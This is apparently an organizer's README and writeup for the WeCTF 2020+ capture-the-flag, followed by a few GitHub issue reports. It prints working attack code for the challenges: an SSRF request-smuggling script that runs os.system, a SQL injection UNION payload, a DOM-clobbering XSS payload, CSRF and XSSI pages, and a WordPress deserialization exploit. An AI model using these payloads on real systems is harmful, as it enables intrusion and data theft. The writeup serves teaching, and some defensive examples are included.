WeCTF 2020+ Source Code & Organizer's Writeup

Overview

WeCTF 2020+

Thank you all for participating! This README contains our writeup sketches. You can also share your writeup on CTFtime.

Event Link: https://ctftime.org/event/1072

Run Challenges Locally

git clone https://github.com/wectf/2020p
cd 2020p && docker-compose up

The port mapping is as follows:

localhost:8000 -> babyrev
172.129.1.100 -> KVCloud
localhost:8003 -> dont-bf-me
localhost:8004 -> Hashtable
localhost:8005 -> Notebin
localhost:8006 -> Wallet

babyrev

38 solves

Description

Shou only allows his gay friends to view the flag here. We got intel that he used a PHP extension for access control, and we retrieved a weird binary.

Handout: https://github.com/wectf/2020p/blob/master/babyrev/babyrev.so

Author: @qisu

Writeup

The extension compares the request's User-Agent header with the string "Flag Viewer 2.0".

PoC:

curl -H "User-Agent: Flag Viewer 2.0" [HOST]

Red Team

61 solves

Description

We overheard that Shou's company hoarded a shiny flag at a super secret subdomain.

His company's domain: shoustinycompany.cf (Challenge is down now)

Note: You are allowed to use a subdomain scanner in this challenge.

Writeup

Step 1: Do a subdomain scan and you will discover docs.shoustinycompany.cf.

Step 2: You find a few files at that subdomain indicating that a zone transfer (AXFR) can be requested from 161.35.126.226.

logs.txt

[12/19] Eddie started the process following RFC 5936.
[12/18] Shou approved NS records transfering.
[12/17] Eddie proposed to transfer NS records to our looking glass server (161.35.126.226:53). 
[12/16] Shou appointed Eddie to be network admin.

info.txt

### Company's websites
Looking Glass: lookingglassv1.shoustinycompany.cf
Flag: [Removed by Shou]

Step 3: You find another subdomain lookingglassv1.shoustinycompany.cf with IP 161.35.126.226.

Step 4: Perform the AXFR transaction against lookingglassv1.shoustinycompany.cf with

dig AXFR shoustinycompany.cf @ns1.shoustinycompany.cf

KVCloud

13 solves

Description

Shou hates using Redis by TCPing it. He instead built an HTTP wrapper for saving his key-value pairs.

Flag is at /flag.txt.

Hint: How to keep-alive a connection?

Note 1: Remote is not using 127.0.0.1 as Redis host.

Note 2: Try a different host if your payload is not working remotely.

Handout: https://github.com/wectf/2020p/blob/master/kvcloud/handout.zip

Writeup

SSRF with Connection: keep-alive:

from requests import *
import urllib.parse

port = 5000
cmd = b"import os; os.system('whoami')"
content_len = str(4 + len(cmd)).encode('ascii')  # len("cmd=") + len(cmd)
# The key ends up on the request line the wrapper sends to redis_port. The CRLFs
# terminate that request, and with Connection: keep-alive the second request
# (POST /debug) is processed on the same connection.
payload = urllib.parse.quote(b"/x\r\nConnection: keep-alive\r\n" +
	b"Pragma: no-cache\r\n\r\nPOST /debug HTTP/1.1\r\n" +
	b"Host: 127.0.0.1:5000\r\nUser-Agent: curl/7.68.0\r\n" +
	b"Accept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\ncmd=%s" % (
		content_len, cmd), safe='')
c = get("http://[HOST]:%s/get?redis_port=%s&key=%s" % (port, port, payload)).content
print(c)
print("http://[HOST]:%s/get?redis_port=%s&key=%s" % (port, port, payload))
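
As an added example (not the organizers' code), here is the input validation a wrapper like this should apply before placing a user-supplied key on the wire: it rejects control characters and URL delimiters in the key, so the smuggled second request in the PoC above never reaches the socket, and it refuses any redis_port other than the configured one. The wrapper's internals and the Redis port are assumptions; the checks are run against the decoded PoC key.

```python
import urllib.parse

REDIS_PORT = 6379  # assumed: the one backend port the wrapper is meant to reach


class BadRequest(ValueError):
    pass


def validate_key(key, max_len=256):
    """Reject keys that could break out of the single request the wrapper builds.
    CR/LF is what lets the PoC's key carry a second, smuggled HTTP request."""
    if not key or len(key) > max_len:
        raise BadRequest("key length out of range")
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in key):
        raise BadRequest("control character in key")
    if any(ch in key for ch in " /?#"):
        raise BadRequest("URL delimiter in key")
    return key


def validate_port(port):
    """Only forward to the configured Redis port: the PoC points redis_port at the
    wrapper's own HTTP listener (5000) to reach its /debug endpoint."""
    if port != str(REDIS_PORT):
        raise BadRequest("redis_port is not user-selectable")
    return REDIS_PORT


def is_safe_request(query_string):
    """True when both /get parameters pass the checks above."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    try:
        validate_port(params.get("redis_port", [""])[0])
        validate_key(params.get("key", [""])[0])
    except BadRequest:
        return False
    return True


def build_query(port, key):
    """URL-encode a key the way the PoC does (quote with safe='')."""
    return "redis_port=%s&key=%s" % (port, urllib.parse.quote(key, safe=""))


# Constructed inputs: the PoC's smuggled key (decoded form) and a benign key.
SMUGGLED_KEY = ("/x\r\nConnection: keep-alive\r\n\r\nPOST /debug HTTP/1.1\r\n"
                "Host: 127.0.0.1:5000\r\nContent-Length: 4\r\n\r\ncmd=")
BENIGN_QS = build_query(6379, "flag")
SMUGGLED_QS = build_query(5000, SMUGGLED_KEY)
```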

dont-bf-me

36 solves

Description

Shou uses Recaptcha for his site to make it "safer".

Hint: The password is so long that it makes any brute-forcing method impotent.

Handout: https://github.com/wectf/2020p/blob/master/dont-bf-me/handout.zip

Writeup

parse_str in login.php can overwrite $RECAPTCHA_URL and $CORRECT_PASSWORD.

Hashtable

15 solves

Description

Universal hashing could prevent hackers from DoSing the hash table by creating a lot of collisions. Shou doubts that. Prove him correct by DoSing this hash table implemented with universal hashing.

Note: having 10 collisions in the same slot will give you the flag.

Handout: https://github.com/wectf/2020p/blob/master/hashtable/handout.zip

Writeup

Pseudo Random Number PoC:

Save the following file as main.go and run go run main.go [TIMESTAMP].

package main

import (
	"fmt"
	"math/big"
	"math/rand"
	"os"
	"strconv"
)

const TableSize = 10000

var TableSizeBI = big.NewInt(int64(TableSize))

const MaxCollision = 10

type LinkedList struct {
	Content       [MaxCollision]int
	InsertedCount int // count of elements in the linked list
}

type HashTable struct {
	Content      [TableSize]*LinkedList // array for mapping hash to the linked list
	HashParam1   *big.Int               // p1 for hashing
	HashParam2   *big.Int               // p2 for hashing
	ElementCount int                    // count of all elements in the hash table
}

// hash computes (value^p1 mod p2) mod TableSize, the challenge's hash function.
func (t *HashTable) hash(value int) uint {
	v := big.NewInt(int64(value))
	var h big.Int
	h.Exp(v, t.HashParam1, t.HashParam2)
	h.Mod(&h, TableSizeBI)
	return uint(h.Uint64())
}

// insert returns true once a slot has received more than MaxCollision values
// and prints the colliding values, which are the payload to submit.
func (t *HashTable) insert(value int) bool {
	var elementHash = t.hash(value)
	var linkedListForHash = t.Content[elementHash]
	linkedListForHash.InsertedCount++
	if linkedListForHash.InsertedCount > MaxCollision {
		fmt.Println(linkedListForHash.Content)
		return true
	}
	t.ElementCount++
	linkedListForHash.Content[linkedListForHash.InsertedCount-1] = value
	return false
}

func main() {
	if len(os.Args) < 2 {
		fmt.Println("usage: go run main.go [TIMESTAMP]")
		os.Exit(1)
	}
	var t HashTable
	x, _ := strconv.Atoi(os.Args[1])
	// Seeding math/rand with the same timestamp the service used reproduces p1 and p2.
	rand.Seed(int64(x))
	t.HashParam1 = big.NewInt(int64(rand.Intn(1 << 32)))
	t.HashParam2 = big.NewInt(int64(rand.Intn(1 << 32)))
	for i := 0; i < TableSize; i++ {
		t.Content[i] = &LinkedList{[MaxCollision]int{}, 0}
	}
	for i := 1 << 13; i < 1<<16; i++ {
		if t.insert(i) {
			break
		}
	}
}

Hall of Fame

22 solves

Description

We made a Slack bot (@hof) to remember our past winners. Hope no one hacks it cuz we are running it on a really important database.

Handout: https://github.com/wectf/2020p/tree/master/hof

Writeup

SQL Injection

Sending the following content to @hof yields the flag:

rank x') UNION SELECT 1,1,(SELECT flag from flags LIMIT 1) ---
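
The payload above, as an added example that is not part of the organizers' code, run against a constructed SQLite stand-in for the bot's database: the string-interpolated query leaks the flags row, the parameterized one does not. The table layout, the three-column result and the ('...') wrapping of the user value are assumptions inferred from the payload.

```python
import sqlite3

# Constructed stand-in for the bot's database and for the query shape behind the
# "rank" command; both are assumptions, not the organizers' code.
SCHEMA = """
CREATE TABLE hof (position INTEGER, team TEXT, year INTEGER);
CREATE TABLE flags (flag TEXT);
INSERT INTO hof VALUES (1, 'team_a', 2019), (2, 'team_b', 2019);
INSERT INTO flags VALUES ('we{constructed_placeholder}');
"""

# The injected part of the writeup's payload (everything after the "rank " command word).
PAYLOAD = "x') UNION SELECT 1,1,(SELECT flag from flags LIMIT 1) ---"


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def rank_vulnerable(conn, user_value):
    """String interpolation: the closing quote and parenthesis in PAYLOAD end the
    intended predicate, UNION appends a row built from the flags table, and the
    trailing -- comments out the rest of the original query."""
    sql = f"SELECT position, team, year FROM hof WHERE team = ('{user_value}')"
    return conn.execute(sql).fetchall()


def rank_parameterized(conn, user_value):
    """Bound parameter: the whole payload is compared as a literal team name, so it
    matches nothing and the flags table is never read."""
    sql = "SELECT position, team, year FROM hof WHERE team = (?)"
    return conn.execute(sql, (user_value,)).fetchall()


def lookup(query_fn, user_value):
    """Run one query function against a fresh in-memory database."""
    conn = open_db()
    try:
        return query_fn(conn, user_value)
    finally:
        conn.close()


def leaked_flag(rows):
    """Return the first cell that looks like a flag, or None if nothing leaked."""
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith("we{"):
                return cell
    return None
```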

Notebin

8 solves

Description

Here is where Shou keeps his pathetic diaries and a shiny flag.

Writeup

DOM Clobbering => XSS

Setting the title as follows makes the content bypass DOMPurify:

<a id="_debug"></a><a id="_debug" name="key" href="sha1:f03e8a370aa8dc80f63a6d67401a692ae72fa530"></a>

Wallet

4 solves

Description

Shou has a habit of saving secrets (i.e. the flag) on the blockchain. Here is where he stores his bitcoin addresses.

Note: wrap what you find on blockchain with we{.....}

Hint 1: You should leak the bitcoin address in Shou's wallet first.

Hint 2: Shou is using Firefox. Firefox does not have CORB.

Handout: https://github.com/wectf/2020p/blob/master/wallet/handout.zip

Writeup

CSRF + XSSI + some recon

0.html:

<body>
<form action="http://[HOST]/address" method="post" id="f">
    <input name="address" value='xxxx"'/>
</form>
</body>
<script>
    f.submit()
</script>

1.html:

<body>
<form action="http://[HOST]/style" method="post" id="f">
    <input name="style" value='"Raw'/>
</form>
</body>
<script>
    f.submit()
</script>

2.html:

<div id="iframe2"></div>
<div id="iframe3"></div>
<script id="script1"></script>
<script>
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));
    }
    async function main() {
        // CSRF 1: set the stored address via 0.html
        const ifr2 = document.createElement('iframe');
        ifr2.name = 'attack';
        ifr2.src = "0.html";
        iframe2.appendChild(ifr2);
        await sleep(1000);
        // CSRF 2: set the style via 1.html
        const ifr3 = document.createElement('iframe');
        ifr3.name = 'attack';
        ifr3.src = "1.html";
        iframe3.appendChild(ifr3);
        await sleep(1000);
        // XSSI: include the victim's page as a script (Firefox has no CORB)
        const sc = document.createElement('script');
        sc.name = 'attack';
        sc.src = "http://[HOST]/";
        script1.appendChild(sc);
        await sleep(1000);
        dealwithit(style); // <= bitcoin address; dealwithit is the author's handler, not included in the writeup
    }
    main();
</script>

Save 0.html, 1.html and 2.html, and send 2.html as the payload.

After getting the bitcoin address, you can find the flag in the OP_RETURN of one transaction.

Wordpress

2 solves

Description

Shou made his first WordPress plugin! Check it out!

Note 1: it is unnecessary to be admin to solve this challenge; to ensure stability, we removed almost all possible ways to become admin.

Handout: https://github.com/wectf/2020p/blob/master/wordpress/handout.zip

Writeup

WordPress Entry Overwrite + Unsafe Deserialization

from requests import *

HOST = "http://wordpress.ctf.so/"
# Serialized Upage object whose conf points at /flag; the plugin's edit_upage page
# lets a logged-in user overwrite the session_tokens entry with it, and WordPress
# unserializes that entry on the next request.
des_content = 'a:1:{i:0;O:5:"Upage":4:{s:7:"user_id";N;s:9:"user_info";a:0:{}s:4:"conf";s:5:"/flag";s:16:"disallowed_words";a:0:{}}}'
s = Session()

s.post(f"{HOST}wp-login.php", headers={'Cookie': 'wordpress_test_cookie=WP Cookie check'}, data={
    "log": "[WORDPRESS EMAIL]",
    "pwd": "[WORDPRESS PASSWORD]",
    "wp-submit": "Log In",
    "redirect_to": HOST,
    "testcookie": "1"
})

print(s.post(f"{HOST}wp-admin/admin.php?page=edit_upage", data={
    "key": "session_tokens",
    "value": des_content
}).text)

print(s.get(f"{HOST}wp-admin").text)

Issues

  • docker-compose up error on challenge hashtable

    I want to run challenges locally, and I got an error when executing "Run go build" for challenge hashtable. I'm not familiar with Go, and I don't know how to solve that problem.

    Here is the log.

    ------
     > [6/6] RUN go build:
    #10 0.528 # vendor/github.com/gin-gonic/gin/internal/json
    #10 0.528 ../vendor/github.com/gin-gonic/gin/internal/json/json.go:5:3: //go:build is not allowed in the standard library
    ------
    executor failed running [/bin/sh -c go build]: exit code: 2
    ERROR: Service 'hashtable' failed to build : Build failed

    Looking forward to a solution, thanks a lot!

    opened by FantasqueX

  • Authentication token

    • One extra quote at the end of line 57 in docker-compose.yaml

    • When I try to run containers with docker-compose up, I got this error: ERROR: Head https://docker.pkg.github.com/v2/wectf/2020p/babyrev/manifests/latest: no basic auth credentials

    Then I tried to directly authenticate on "https://docker.pkg.github.com/v2/wectf/2020p/babyrev/manifests/latest:" and got this one: {"errors":[{"code":"UNAUTHORIZED","message":"Your request could not be authenticated by the GitHub Packages service. Please ensure your access token is valid and has the appropriate scopes configured."}]}

    opened by MiniExploit

  • Fix go build error

    I found the same problem as #2 in challenge notebin

    opened by FantasqueX